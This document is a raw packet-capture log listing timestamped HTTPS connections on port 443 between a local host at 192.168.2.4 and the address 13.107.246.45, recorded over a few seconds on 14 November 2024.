                            Nov 14, 2024 23:39:03.536087036 CET4435521013.107.246.45192.168.2.4
                            Nov 14, 2024 23:39:03.536277056 CET55210443192.168.2.413.107.246.45
                            Nov 14, 2024 23:39:03.536277056 CET55210443192.168.2.413.107.246.45
                            Nov 14, 2024 23:39:03.536315918 CET4435521013.107.246.45192.168.2.4
                            Nov 14, 2024 23:39:03.683499098 CET4435520613.107.246.45192.168.2.4
                            Nov 14, 2024 23:39:03.683865070 CET55206443192.168.2.413.107.246.45
                            Nov 14, 2024 23:39:03.683897018 CET4435520613.107.246.45192.168.2.4
                            Nov 14, 2024 23:39:03.684282064 CET55206443192.168.2.413.107.246.45
                            Nov 14, 2024 23:39:03.684288025 CET4435520613.107.246.45192.168.2.4
                            Nov 14, 2024 23:39:03.821187973 CET4435520613.107.246.45192.168.2.4
                            Nov 14, 2024 23:39:03.821367979 CET4435520613.107.246.45192.168.2.4
                            Nov 14, 2024 23:39:03.821451902 CET55206443192.168.2.413.107.246.45
                            Nov 14, 2024 23:39:03.821506977 CET55206443192.168.2.413.107.246.45
                            Nov 14, 2024 23:39:03.821531057 CET4435520613.107.246.45192.168.2.4
                            Nov 14, 2024 23:39:03.821546078 CET55206443192.168.2.413.107.246.45
                            Nov 14, 2024 23:39:03.821552992 CET4435520613.107.246.45192.168.2.4
                            Nov 14, 2024 23:39:03.823779106 CET55211443192.168.2.413.107.246.45
                            Nov 14, 2024 23:39:03.823808908 CET4435521113.107.246.45192.168.2.4
                            Nov 14, 2024 23:39:03.823899031 CET55211443192.168.2.413.107.246.45
                            Nov 14, 2024 23:39:03.824017048 CET55211443192.168.2.413.107.246.45
                            Nov 14, 2024 23:39:03.824023962 CET4435521113.107.246.45192.168.2.4
                            Nov 14, 2024 23:39:03.944845915 CET4435520713.107.246.45192.168.2.4
                            Nov 14, 2024 23:39:03.945347071 CET55207443192.168.2.413.107.246.45
                            Nov 14, 2024 23:39:03.945405960 CET4435520713.107.246.45192.168.2.4
                            Nov 14, 2024 23:39:03.945621014 CET55207443192.168.2.413.107.246.45
                            Nov 14, 2024 23:39:03.945636034 CET4435520713.107.246.45192.168.2.4
                            Nov 14, 2024 23:39:04.043767929 CET4435520813.107.246.45192.168.2.4
                            Nov 14, 2024 23:39:04.044452906 CET55208443192.168.2.413.107.246.45
                            Nov 14, 2024 23:39:04.044452906 CET55208443192.168.2.413.107.246.45
                            Nov 14, 2024 23:39:04.044475079 CET4435520813.107.246.45192.168.2.4
                            Nov 14, 2024 23:39:04.044481993 CET4435520813.107.246.45192.168.2.4
                            Nov 14, 2024 23:39:04.080153942 CET4435520713.107.246.45192.168.2.4
                            Nov 14, 2024 23:39:04.080296993 CET4435520713.107.246.45192.168.2.4
                            Nov 14, 2024 23:39:04.080359936 CET55207443192.168.2.413.107.246.45
                            Nov 14, 2024 23:39:04.080436945 CET55207443192.168.2.413.107.246.45
                            Nov 14, 2024 23:39:04.080436945 CET55207443192.168.2.413.107.246.45
                            Nov 14, 2024 23:39:04.080477953 CET4435520713.107.246.45192.168.2.4
                            Nov 14, 2024 23:39:04.080509901 CET4435520713.107.246.45192.168.2.4
                            Nov 14, 2024 23:39:04.082688093 CET55212443192.168.2.413.107.246.45
                            Nov 14, 2024 23:39:04.082720041 CET4435521213.107.246.45192.168.2.4
                            Nov 14, 2024 23:39:04.082848072 CET55212443192.168.2.413.107.246.45
                            Nov 14, 2024 23:39:04.083329916 CET55212443192.168.2.413.107.246.45
                            Nov 14, 2024 23:39:04.083340883 CET4435521213.107.246.45192.168.2.4
                            Nov 14, 2024 23:39:04.173299074 CET4435520813.107.246.45192.168.2.4
                            Nov 14, 2024 23:39:04.173437119 CET4435520813.107.246.45192.168.2.4
                            Nov 14, 2024 23:39:04.173682928 CET55208443192.168.2.413.107.246.45
                            Nov 14, 2024 23:39:04.173702955 CET55208443192.168.2.413.107.246.45
                            Nov 14, 2024 23:39:04.173702955 CET55208443192.168.2.413.107.246.45
                            Nov 14, 2024 23:39:04.173712969 CET4435520813.107.246.45192.168.2.4
                            Nov 14, 2024 23:39:04.173721075 CET4435520813.107.246.45192.168.2.4
                            Nov 14, 2024 23:39:04.175775051 CET55213443192.168.2.413.107.246.45
                            Nov 14, 2024 23:39:04.175858974 CET4435521313.107.246.45192.168.2.4
                            Nov 14, 2024 23:39:04.175986052 CET55213443192.168.2.413.107.246.45
                            Nov 14, 2024 23:39:04.176099062 CET55213443192.168.2.413.107.246.45
                            Nov 14, 2024 23:39:04.176119089 CET4435521313.107.246.45192.168.2.4
                            Nov 14, 2024 23:39:04.266316891 CET4435521013.107.246.45192.168.2.4
                            Nov 14, 2024 23:39:04.266954899 CET55210443192.168.2.413.107.246.45
                            Nov 14, 2024 23:39:04.266956091 CET55210443192.168.2.413.107.246.45
                            Nov 14, 2024 23:39:04.266976118 CET4435521013.107.246.45192.168.2.4
                            Nov 14, 2024 23:39:04.266983032 CET4435521013.107.246.45192.168.2.4
                            Nov 14, 2024 23:39:04.267695904 CET4435520913.107.246.45192.168.2.4
                            Nov 14, 2024 23:39:04.268457890 CET55209443192.168.2.413.107.246.45
                            Nov 14, 2024 23:39:04.268520117 CET4435520913.107.246.45192.168.2.4
                            Nov 14, 2024 23:39:04.268824100 CET55209443192.168.2.413.107.246.45
                            Nov 14, 2024 23:39:04.268877983 CET4435520913.107.246.45192.168.2.4
                            Nov 14, 2024 23:39:04.417133093 CET4435521013.107.246.45192.168.2.4
                            Nov 14, 2024 23:39:04.417280912 CET4435521013.107.246.45192.168.2.4
                            Nov 14, 2024 23:39:04.417341948 CET55210443192.168.2.413.107.246.45
                            Nov 14, 2024 23:39:04.417387962 CET55210443192.168.2.413.107.246.45
                            Nov 14, 2024 23:39:04.417387962 CET55210443192.168.2.413.107.246.45
                            Nov 14, 2024 23:39:04.417399883 CET4435521013.107.246.45192.168.2.4
                            Nov 14, 2024 23:39:04.417407990 CET4435521013.107.246.45192.168.2.4
                            Nov 14, 2024 23:39:04.419768095 CET55214443192.168.2.413.107.246.45
                            Nov 14, 2024 23:39:04.419805050 CET4435521413.107.246.45192.168.2.4
                            Nov 14, 2024 23:39:04.419955969 CET55214443192.168.2.413.107.246.45
                            Nov 14, 2024 23:39:04.420233011 CET55214443192.168.2.413.107.246.45
                            Nov 14, 2024 23:39:04.420243979 CET4435521413.107.246.45192.168.2.4
                            Nov 14, 2024 23:39:04.422229052 CET4435520913.107.246.45192.168.2.4
                            Nov 14, 2024 23:39:04.422486067 CET4435520913.107.246.45192.168.2.4
                            Nov 14, 2024 23:39:04.422621965 CET55209443192.168.2.413.107.246.45
                            Nov 14, 2024 23:39:04.422622919 CET55209443192.168.2.413.107.246.45
                            Nov 14, 2024 23:39:04.422622919 CET55209443192.168.2.413.107.246.45
                            Nov 14, 2024 23:39:04.424360991 CET55215443192.168.2.413.107.246.45
                            Nov 14, 2024 23:39:04.424457073 CET4435521513.107.246.45192.168.2.4
                            Nov 14, 2024 23:39:04.424545050 CET55215443192.168.2.413.107.246.45
                            Nov 14, 2024 23:39:04.424690962 CET55215443192.168.2.413.107.246.45
                            Nov 14, 2024 23:39:04.424710035 CET4435521513.107.246.45192.168.2.4
                            Nov 14, 2024 23:39:04.563683033 CET4435521113.107.246.45192.168.2.4
                            Nov 14, 2024 23:39:04.564088106 CET55211443192.168.2.413.107.246.45
                            Nov 14, 2024 23:39:04.564111948 CET4435521113.107.246.45192.168.2.4
                            Nov 14, 2024 23:39:04.564423084 CET55211443192.168.2.413.107.246.45
                            Nov 14, 2024 23:39:04.564441919 CET4435521113.107.246.45192.168.2.4
                            Nov 14, 2024 23:39:04.694286108 CET4435521113.107.246.45192.168.2.4
                            Nov 14, 2024 23:39:04.694452047 CET4435521113.107.246.45192.168.2.4
                            Nov 14, 2024 23:39:04.694658041 CET55211443192.168.2.413.107.246.45
                            Nov 14, 2024 23:39:04.694658041 CET55211443192.168.2.413.107.246.45
                            Nov 14, 2024 23:39:04.694658041 CET55211443192.168.2.413.107.246.45
                            Nov 14, 2024 23:39:04.696912050 CET55216443192.168.2.413.107.246.45
                            Nov 14, 2024 23:39:04.696995974 CET4435521613.107.246.45192.168.2.4
                            Nov 14, 2024 23:39:04.697076082 CET55216443192.168.2.413.107.246.45
                            Nov 14, 2024 23:39:04.697328091 CET55216443192.168.2.413.107.246.45
                            Nov 14, 2024 23:39:04.697407961 CET4435521613.107.246.45192.168.2.4
                            Nov 14, 2024 23:39:04.727838993 CET55209443192.168.2.413.107.246.45
                            Nov 14, 2024 23:39:04.727904081 CET4435520913.107.246.45192.168.2.4
                            Nov 14, 2024 23:39:04.900171041 CET4435521313.107.246.45192.168.2.4
                            Nov 14, 2024 23:39:04.900629997 CET55213443192.168.2.413.107.246.45
                            Nov 14, 2024 23:39:04.900717020 CET4435521313.107.246.45192.168.2.4
                            Nov 14, 2024 23:39:04.900892019 CET55213443192.168.2.413.107.246.45
                            Nov 14, 2024 23:39:04.900908947 CET4435521313.107.246.45192.168.2.4
                            Nov 14, 2024 23:39:05.009094000 CET55211443192.168.2.413.107.246.45
                            Nov 14, 2024 23:39:05.009156942 CET4435521113.107.246.45192.168.2.4
                            Nov 14, 2024 23:39:05.037895918 CET4435521313.107.246.45192.168.2.4
                            Nov 14, 2024 23:39:05.038057089 CET4435521313.107.246.45192.168.2.4
                            Nov 14, 2024 23:39:05.038238049 CET55213443192.168.2.413.107.246.45
                            Nov 14, 2024 23:39:05.038239002 CET55213443192.168.2.413.107.246.45
                            Nov 14, 2024 23:39:05.038239002 CET55213443192.168.2.413.107.246.45
                            Nov 14, 2024 23:39:05.040561914 CET55217443192.168.2.413.107.246.45
                            Nov 14, 2024 23:39:05.040601969 CET4435521713.107.246.45192.168.2.4
                            Nov 14, 2024 23:39:05.040659904 CET55217443192.168.2.413.107.246.45
                            Nov 14, 2024 23:39:05.040786982 CET55217443192.168.2.413.107.246.45
                            Nov 14, 2024 23:39:05.040793896 CET4435521713.107.246.45192.168.2.4
                            Nov 14, 2024 23:39:05.156301975 CET4435521513.107.246.45192.168.2.4
                            Nov 14, 2024 23:39:05.156743050 CET55215443192.168.2.413.107.246.45
                            Nov 14, 2024 23:39:05.156804085 CET4435521513.107.246.45192.168.2.4
                            Nov 14, 2024 23:39:05.157140017 CET55215443192.168.2.413.107.246.45
                            Nov 14, 2024 23:39:05.157192945 CET4435521513.107.246.45192.168.2.4
                            Nov 14, 2024 23:39:05.164586067 CET4435521413.107.246.45192.168.2.4
                            Nov 14, 2024 23:39:05.164902925 CET55214443192.168.2.413.107.246.45
                            Nov 14, 2024 23:39:05.164916992 CET4435521413.107.246.45192.168.2.4
                            Nov 14, 2024 23:39:05.165226936 CET55214443192.168.2.413.107.246.45
                            Nov 14, 2024 23:39:05.165234089 CET4435521413.107.246.45192.168.2.4
                            Nov 14, 2024 23:39:05.299482107 CET4435521513.107.246.45192.168.2.4
                            Nov 14, 2024 23:39:05.299552917 CET4435521513.107.246.45192.168.2.4
                            Nov 14, 2024 23:39:05.299895048 CET4435521413.107.246.45192.168.2.4
                            Nov 14, 2024 23:39:05.300049067 CET4435521413.107.246.45192.168.2.4
                            Nov 14, 2024 23:39:05.300101995 CET55214443192.168.2.413.107.246.45
                            Nov 14, 2024 23:39:05.300097942 CET55215443192.168.2.413.107.246.45
                            Nov 14, 2024 23:39:05.300098896 CET55215443192.168.2.413.107.246.45
                            Nov 14, 2024 23:39:05.300098896 CET55215443192.168.2.413.107.246.45
                            Nov 14, 2024 23:39:05.301075935 CET55214443192.168.2.413.107.246.45
                            Nov 14, 2024 23:39:05.301095963 CET4435521413.107.246.45192.168.2.4
                            Nov 14, 2024 23:39:05.301109076 CET55214443192.168.2.413.107.246.45
                            Nov 14, 2024 23:39:05.301116943 CET4435521413.107.246.45192.168.2.4
                            Nov 14, 2024 23:39:05.304209948 CET55218443192.168.2.413.107.246.45
                            Nov 14, 2024 23:39:05.304240942 CET4435521813.107.246.45192.168.2.4
                            Nov 14, 2024 23:39:05.304411888 CET55218443192.168.2.413.107.246.45
                            Nov 14, 2024 23:39:05.304763079 CET55219443192.168.2.413.107.246.45
                            Nov 14, 2024 23:39:05.304801941 CET4435521913.107.246.45192.168.2.4
                            Nov 14, 2024 23:39:05.304908037 CET55218443192.168.2.413.107.246.45
                            Nov 14, 2024 23:39:05.304927111 CET55219443192.168.2.413.107.246.45
                            Nov 14, 2024 23:39:05.304949999 CET4435521813.107.246.45192.168.2.4
                            Nov 14, 2024 23:39:05.305174112 CET55219443192.168.2.413.107.246.45
                            Nov 14, 2024 23:39:05.305190086 CET4435521913.107.246.45192.168.2.4
                            Nov 14, 2024 23:39:05.337224960 CET55213443192.168.2.413.107.246.45
                            Nov 14, 2024 23:39:05.337286949 CET4435521313.107.246.45192.168.2.4
                            Nov 14, 2024 23:39:05.433092117 CET4435521613.107.246.45192.168.2.4
                            Nov 14, 2024 23:39:05.433628082 CET55216443192.168.2.413.107.246.45
                            Nov 14, 2024 23:39:05.433716059 CET4435521613.107.246.45192.168.2.4
                            Nov 14, 2024 23:39:05.434025049 CET55216443192.168.2.413.107.246.45
                            Nov 14, 2024 23:39:05.434040070 CET4435521613.107.246.45192.168.2.4
                            Nov 14, 2024 23:39:05.561593056 CET4435521613.107.246.45192.168.2.4
                            Nov 14, 2024 23:39:05.561638117 CET4435521613.107.246.45192.168.2.4
                            Nov 14, 2024 23:39:05.561744928 CET4435521613.107.246.45192.168.2.4
                            Nov 14, 2024 23:39:05.561928034 CET55216443192.168.2.413.107.246.45
                            Nov 14, 2024 23:39:05.561928034 CET55216443192.168.2.413.107.246.45
                            Nov 14, 2024 23:39:05.561928988 CET55216443192.168.2.413.107.246.45
                            Nov 14, 2024 23:39:05.564218998 CET55220443192.168.2.413.107.246.45
                            Nov 14, 2024 23:39:05.564301968 CET4435522013.107.246.45192.168.2.4
                            Nov 14, 2024 23:39:05.564393997 CET55220443192.168.2.413.107.246.45
                            Nov 14, 2024 23:39:05.564686060 CET55220443192.168.2.413.107.246.45
                            Nov 14, 2024 23:39:05.564743042 CET4435522013.107.246.45192.168.2.4
                            Nov 14, 2024 23:39:05.602935076 CET55215443192.168.2.413.107.246.45
                            Nov 14, 2024 23:39:05.602996111 CET4435521513.107.246.45192.168.2.4
                            Nov 14, 2024 23:39:05.692320108 CET4435521213.107.246.45192.168.2.4
                            Nov 14, 2024 23:39:05.692775965 CET55212443192.168.2.413.107.246.45
                            Nov 14, 2024 23:39:05.692795992 CET4435521213.107.246.45192.168.2.4
                            Nov 14, 2024 23:39:05.693273067 CET55212443192.168.2.413.107.246.45
                            Nov 14, 2024 23:39:05.693283081 CET4435521213.107.246.45192.168.2.4
                            Nov 14, 2024 23:39:05.792829037 CET4435521713.107.246.45192.168.2.4
                            Nov 14, 2024 23:39:05.793490887 CET55217443192.168.2.413.107.246.45
                            Nov 14, 2024 23:39:05.793514967 CET4435521713.107.246.45192.168.2.4
                            Nov 14, 2024 23:39:05.793618917 CET55217443192.168.2.413.107.246.45
                            Nov 14, 2024 23:39:05.793626070 CET4435521713.107.246.45192.168.2.4
                            Nov 14, 2024 23:39:05.828543901 CET4435521213.107.246.45192.168.2.4
                            Nov 14, 2024 23:39:05.828891993 CET4435521213.107.246.45192.168.2.4
                            Nov 14, 2024 23:39:05.828953981 CET55212443192.168.2.413.107.246.45
                            Nov 14, 2024 23:39:05.828989983 CET55212443192.168.2.413.107.246.45
                            Nov 14, 2024 23:39:05.828989983 CET55212443192.168.2.413.107.246.45
                            Nov 14, 2024 23:39:05.829010010 CET4435521213.107.246.45192.168.2.4
                            Nov 14, 2024 23:39:05.829020977 CET4435521213.107.246.45192.168.2.4
                            Nov 14, 2024 23:39:05.831351995 CET55221443192.168.2.413.107.246.45
                            Nov 14, 2024 23:39:05.831377983 CET4435522113.107.246.45192.168.2.4
                            Nov 14, 2024 23:39:05.831443071 CET55221443192.168.2.413.107.246.45
                            Nov 14, 2024 23:39:05.831648111 CET55221443192.168.2.413.107.246.45
                            Nov 14, 2024 23:39:05.831661940 CET4435522113.107.246.45192.168.2.4
                            Nov 14, 2024 23:39:05.868462086 CET55216443192.168.2.413.107.246.45
                            Nov 14, 2024 23:39:05.868526936 CET4435521613.107.246.45192.168.2.4
                            Nov 14, 2024 23:39:05.920828104 CET4435521713.107.246.45192.168.2.4
                            Nov 14, 2024 23:39:05.921401024 CET4435521713.107.246.45192.168.2.4
                            Nov 14, 2024 23:39:05.921499014 CET55217443192.168.2.413.107.246.45
                            Nov 14, 2024 23:39:05.921499014 CET55217443192.168.2.413.107.246.45
                            Nov 14, 2024 23:39:05.921638012 CET55217443192.168.2.413.107.246.45
                            Nov 14, 2024 23:39:05.921654940 CET4435521713.107.246.45192.168.2.4
                            Nov 14, 2024 23:39:05.923578024 CET55222443192.168.2.413.107.246.45
                            Nov 14, 2024 23:39:05.923664093 CET4435522213.107.246.45192.168.2.4
                            Nov 14, 2024 23:39:05.923758984 CET55222443192.168.2.413.107.246.45
                            Nov 14, 2024 23:39:05.923875093 CET55222443192.168.2.413.107.246.45
                            Nov 14, 2024 23:39:05.923897982 CET4435522213.107.246.45192.168.2.4
                            Nov 14, 2024 23:39:06.024203062 CET4435521813.107.246.45192.168.2.4
                            Nov 14, 2024 23:39:06.024573088 CET55218443192.168.2.413.107.246.45
                            Nov 14, 2024 23:39:06.024597883 CET4435521813.107.246.45192.168.2.4
                            Nov 14, 2024 23:39:06.024991989 CET55218443192.168.2.413.107.246.45
                            Nov 14, 2024 23:39:06.025007963 CET4435521813.107.246.45192.168.2.4
                            Nov 14, 2024 23:39:06.075608015 CET4435521913.107.246.45192.168.2.4
                            Nov 14, 2024 23:39:06.075964928 CET55219443192.168.2.413.107.246.45
                            Nov 14, 2024 23:39:06.075983047 CET4435521913.107.246.45192.168.2.4
                            Nov 14, 2024 23:39:06.076289892 CET55219443192.168.2.413.107.246.45
                            Nov 14, 2024 23:39:06.076296091 CET4435521913.107.246.45192.168.2.4
                            Nov 14, 2024 23:39:06.151997089 CET4435521813.107.246.45192.168.2.4
                            Nov 14, 2024 23:39:06.152020931 CET4435521813.107.246.45192.168.2.4
                            Nov 14, 2024 23:39:06.152086020 CET4435521813.107.246.45192.168.2.4
                            Nov 14, 2024 23:39:06.152093887 CET55218443192.168.2.413.107.246.45
                            Nov 14, 2024 23:39:06.152163982 CET55218443192.168.2.413.107.246.45
                            Nov 14, 2024 23:39:06.152216911 CET55218443192.168.2.413.107.246.45
                            Nov 14, 2024 23:39:06.152255058 CET4435521813.107.246.45192.168.2.4
                            Nov 14, 2024 23:39:06.152299881 CET55218443192.168.2.413.107.246.45
                            Nov 14, 2024 23:39:06.152316093 CET4435521813.107.246.45192.168.2.4
                            Nov 14, 2024 23:39:06.154517889 CET55223443192.168.2.413.107.246.45
                            Nov 14, 2024 23:39:06.154546976 CET4435522313.107.246.45192.168.2.4
                            Nov 14, 2024 23:39:06.154684067 CET55223443192.168.2.413.107.246.45
                            Nov 14, 2024 23:39:06.155333996 CET55223443192.168.2.413.107.246.45
                            Nov 14, 2024 23:39:06.155347109 CET4435522313.107.246.45192.168.2.4
                            Nov 14, 2024 23:39:06.210712910 CET4435521913.107.246.45192.168.2.4
                            Nov 14, 2024 23:39:06.210922956 CET4435521913.107.246.45192.168.2.4
                            Nov 14, 2024 23:39:06.211016893 CET55219443192.168.2.413.107.246.45
                            Nov 14, 2024 23:39:06.211016893 CET55219443192.168.2.413.107.246.45
                            Nov 14, 2024 23:39:06.211069107 CET55219443192.168.2.413.107.246.45
                            Nov 14, 2024 23:39:06.211085081 CET4435521913.107.246.45192.168.2.4
                            Nov 14, 2024 23:39:06.212878942 CET55224443192.168.2.413.107.246.45
                            Nov 14, 2024 23:39:06.212965012 CET4435522413.107.246.45192.168.2.4
                            Nov 14, 2024 23:39:06.213049889 CET55224443192.168.2.413.107.246.45
                            Nov 14, 2024 23:39:06.213140011 CET55224443192.168.2.413.107.246.45
                            Nov 14, 2024 23:39:06.213160038 CET4435522413.107.246.45192.168.2.4
                            Nov 14, 2024 23:39:06.306480885 CET4435522013.107.246.45192.168.2.4
                            Nov 14, 2024 23:39:06.306751013 CET55220443192.168.2.413.107.246.45
                            Nov 14, 2024 23:39:06.306849003 CET4435522013.107.246.45192.168.2.4
                            Nov 14, 2024 23:39:06.307360888 CET55220443192.168.2.413.107.246.45
                            Nov 14, 2024 23:39:06.307414055 CET4435522013.107.246.45192.168.2.4
                            Nov 14, 2024 23:39:06.437195063 CET4435522013.107.246.45192.168.2.4
                            Nov 14, 2024 23:39:06.437249899 CET4435522013.107.246.45192.168.2.4
                            Nov 14, 2024 23:39:06.437314034 CET55220443192.168.2.413.107.246.45
                            Nov 14, 2024 23:39:06.437374115 CET4435522013.107.246.45192.168.2.4
                            Nov 14, 2024 23:39:06.437418938 CET4435522013.107.246.45192.168.2.4
                            Nov 14, 2024 23:39:06.437431097 CET55220443192.168.2.413.107.246.45
                            Nov 14, 2024 23:39:06.437520981 CET55220443192.168.2.413.107.246.45
                            Nov 14, 2024 23:39:06.437520981 CET55220443192.168.2.413.107.246.45
                            Nov 14, 2024 23:39:06.437568903 CET4435522013.107.246.45192.168.2.4
                            Nov 14, 2024 23:39:06.437601089 CET55220443192.168.2.413.107.246.45
                            Nov 14, 2024 23:39:06.437616110 CET4435522013.107.246.45192.168.2.4
                            Nov 14, 2024 23:39:06.439599037 CET55225443192.168.2.413.107.246.45
                            Nov 14, 2024 23:39:06.439670086 CET4435522513.107.246.45192.168.2.4
                            Nov 14, 2024 23:39:06.439742088 CET55225443192.168.2.413.107.246.45
                            Nov 14, 2024 23:39:06.439846992 CET55225443192.168.2.413.107.246.45
                            Nov 14, 2024 23:39:06.439862967 CET4435522513.107.246.45192.168.2.4
                            Nov 14, 2024 23:39:06.574078083 CET4435522113.107.246.45192.168.2.4
                            Nov 14, 2024 23:39:06.574429035 CET55221443192.168.2.413.107.246.45
                            Nov 14, 2024 23:39:06.574445009 CET4435522113.107.246.45192.168.2.4
                            Nov 14, 2024 23:39:06.574790001 CET55221443192.168.2.413.107.246.45
                            Nov 14, 2024 23:39:06.574795008 CET4435522113.107.246.45192.168.2.4
                            Nov 14, 2024 23:39:06.678941965 CET4435522213.107.246.45192.168.2.4
                            Nov 14, 2024 23:39:06.679281950 CET55222443192.168.2.413.107.246.45
                            Nov 14, 2024 23:39:06.679356098 CET4435522213.107.246.45192.168.2.4
                            Nov 14, 2024 23:39:06.679753065 CET55222443192.168.2.413.107.246.45
                            Nov 14, 2024 23:39:06.679766893 CET4435522213.107.246.45192.168.2.4
                            Nov 14, 2024 23:39:06.714481115 CET4435522113.107.246.45192.168.2.4
                            Nov 14, 2024 23:39:06.714534998 CET4435522113.107.246.45192.168.2.4
                            Nov 14, 2024 23:39:06.714663982 CET4435522113.107.246.45192.168.2.4
                            Nov 14, 2024 23:39:06.714700937 CET55221443192.168.2.413.107.246.45
                            Nov 14, 2024 23:39:06.714746952 CET55221443192.168.2.413.107.246.45
                            Nov 14, 2024 23:39:06.714792013 CET55221443192.168.2.413.107.246.45
                            Nov 14, 2024 23:39:06.714821100 CET4435522113.107.246.45192.168.2.4
                            Nov 14, 2024 23:39:06.714837074 CET55221443192.168.2.413.107.246.45
                            Nov 14, 2024 23:39:06.714843988 CET4435522113.107.246.45192.168.2.4
                            Nov 14, 2024 23:39:06.717411995 CET55226443192.168.2.413.107.246.45
                            Nov 14, 2024 23:39:06.717495918 CET4435522613.107.246.45192.168.2.4
                            Nov 14, 2024 23:39:06.717583895 CET55226443192.168.2.413.107.246.45
                            Nov 14, 2024 23:39:06.717784882 CET55226443192.168.2.413.107.246.45
                            Nov 14, 2024 23:39:06.717819929 CET4435522613.107.246.45192.168.2.4
                            Nov 14, 2024 23:39:06.817687035 CET4435522213.107.246.45192.168.2.4
                            Nov 14, 2024 23:39:06.818476915 CET4435522213.107.246.45192.168.2.4
                            Nov 14, 2024 23:39:06.818555117 CET55222443192.168.2.413.107.246.45
                            Nov 14, 2024 23:39:06.818636894 CET55222443192.168.2.413.107.246.45
                            Nov 14, 2024 23:39:06.818636894 CET55222443192.168.2.413.107.246.45
                            Nov 14, 2024 23:39:06.818679094 CET4435522213.107.246.45192.168.2.4
                            Nov 14, 2024 23:39:06.818706989 CET4435522213.107.246.45192.168.2.4
                            Nov 14, 2024 23:39:06.820545912 CET55227443192.168.2.413.107.246.45
                            Nov 14, 2024 23:39:06.820631981 CET4435522713.107.246.45192.168.2.4
                            Nov 14, 2024 23:39:06.820718050 CET55227443192.168.2.413.107.246.45
                            Nov 14, 2024 23:39:06.820854902 CET55227443192.168.2.413.107.246.45
                            Nov 14, 2024 23:39:06.820883989 CET4435522713.107.246.45192.168.2.4
                            Nov 14, 2024 23:39:06.903769970 CET4435522313.107.246.45192.168.2.4
                            Nov 14, 2024 23:39:06.904155970 CET55223443192.168.2.413.107.246.45
                            Nov 14, 2024 23:39:06.904170990 CET4435522313.107.246.45192.168.2.4
                            Nov 14, 2024 23:39:06.904519081 CET55223443192.168.2.413.107.246.45
                            Nov 14, 2024 23:39:06.904525042 CET4435522313.107.246.45192.168.2.4
                            Nov 14, 2024 23:39:06.955439091 CET4435522413.107.246.45192.168.2.4
                            Nov 14, 2024 23:39:06.955837011 CET55224443192.168.2.413.107.246.45
                            Nov 14, 2024 23:39:06.955919981 CET4435522413.107.246.45192.168.2.4
                            Nov 14, 2024 23:39:06.956206083 CET55224443192.168.2.413.107.246.45
                            Nov 14, 2024 23:39:06.956259012 CET4435522413.107.246.45192.168.2.4
                            Nov 14, 2024 23:39:07.033037901 CET4435522313.107.246.45192.168.2.4
                            Nov 14, 2024 23:39:07.033104897 CET4435522313.107.246.45192.168.2.4
                            Nov 14, 2024 23:39:07.033179998 CET55223443192.168.2.413.107.246.45
                            Nov 14, 2024 23:39:07.033261061 CET55223443192.168.2.413.107.246.45
                            Nov 14, 2024 23:39:07.033279896 CET4435522313.107.246.45192.168.2.4
                            Nov 14, 2024 23:39:07.033292055 CET55223443192.168.2.413.107.246.45
                            Nov 14, 2024 23:39:07.033302069 CET4435522313.107.246.45192.168.2.4
                            Nov 14, 2024 23:39:07.038683891 CET55228443192.168.2.413.107.246.45
                            Nov 14, 2024 23:39:07.038768053 CET4435522813.107.246.45192.168.2.4
                            Nov 14, 2024 23:39:07.038866043 CET55228443192.168.2.413.107.246.45
                            Nov 14, 2024 23:39:07.039176941 CET55228443192.168.2.413.107.246.45
                            Nov 14, 2024 23:39:07.039212942 CET4435522813.107.246.45192.168.2.4
                            Nov 14, 2024 23:39:07.085114002 CET4435522413.107.246.45192.168.2.4
                            Nov 14, 2024 23:39:07.085191011 CET4435522413.107.246.45192.168.2.4
                            Nov 14, 2024 23:39:07.085338116 CET55224443192.168.2.413.107.246.45
                            Nov 14, 2024 23:39:07.085339069 CET55224443192.168.2.413.107.246.45
                            Nov 14, 2024 23:39:07.085508108 CET55224443192.168.2.413.107.246.45
                            Nov 14, 2024 23:39:07.085546017 CET4435522413.107.246.45192.168.2.4
                            Nov 14, 2024 23:39:07.087512970 CET55229443192.168.2.413.107.246.45
                            Nov 14, 2024 23:39:07.087605953 CET4435522913.107.246.45192.168.2.4
                            Nov 14, 2024 23:39:07.087677956 CET55229443192.168.2.413.107.246.45
                            Nov 14, 2024 23:39:07.087815046 CET55229443192.168.2.413.107.246.45
                            Nov 14, 2024 23:39:07.087852001 CET4435522913.107.246.45192.168.2.4
                            Nov 14, 2024 23:39:07.325263977 CET4435522513.107.246.45192.168.2.4
                            Nov 14, 2024 23:39:07.325737000 CET55225443192.168.2.413.107.246.45
                            Nov 14, 2024 23:39:07.325799942 CET4435522513.107.246.45192.168.2.4
                            Nov 14, 2024 23:39:07.326014042 CET55225443192.168.2.413.107.246.45
                            Nov 14, 2024 23:39:07.326030970 CET4435522513.107.246.45192.168.2.4
                            Nov 14, 2024 23:39:07.456624985 CET4435522513.107.246.45192.168.2.4
                            Nov 14, 2024 23:39:07.456708908 CET4435522513.107.246.45192.168.2.4
                            Nov 14, 2024 23:39:07.456785917 CET55225443192.168.2.413.107.246.45
                            Nov 14, 2024 23:39:07.456904888 CET55225443192.168.2.413.107.246.45
                            Nov 14, 2024 23:39:07.456904888 CET55225443192.168.2.413.107.246.45
                            Nov 14, 2024 23:39:07.456948996 CET4435522513.107.246.45192.168.2.4
                            Nov 14, 2024 23:39:07.456976891 CET4435522513.107.246.45192.168.2.4
                            Nov 14, 2024 23:39:07.459387064 CET55230443192.168.2.413.107.246.45
                            Nov 14, 2024 23:39:07.459440947 CET4435523013.107.246.45192.168.2.4
                            Nov 14, 2024 23:39:07.459515095 CET55230443192.168.2.413.107.246.45
                            Nov 14, 2024 23:39:07.459647894 CET55230443192.168.2.413.107.246.45
                            Nov 14, 2024 23:39:07.459664106 CET4435523013.107.246.45192.168.2.4
                            Nov 14, 2024 23:39:07.460149050 CET4435522613.107.246.45192.168.2.4
                            Nov 14, 2024 23:39:07.460519075 CET55226443192.168.2.413.107.246.45
                            Nov 14, 2024 23:39:07.460576057 CET4435522613.107.246.45192.168.2.4
                            Nov 14, 2024 23:39:07.460880041 CET55226443192.168.2.413.107.246.45
                            Nov 14, 2024 23:39:07.460900068 CET4435522613.107.246.45192.168.2.4
                            Nov 14, 2024 23:39:07.563842058 CET4435522713.107.246.45192.168.2.4
                            Nov 14, 2024 23:39:07.564145088 CET55227443192.168.2.413.107.246.45
                            Nov 14, 2024 23:39:07.564204931 CET4435522713.107.246.45192.168.2.4
                            Nov 14, 2024 23:39:07.564488888 CET55227443192.168.2.413.107.246.45
                            Nov 14, 2024 23:39:07.564502001 CET4435522713.107.246.45192.168.2.4
                            Nov 14, 2024 23:39:07.594207048 CET4435522613.107.246.45192.168.2.4
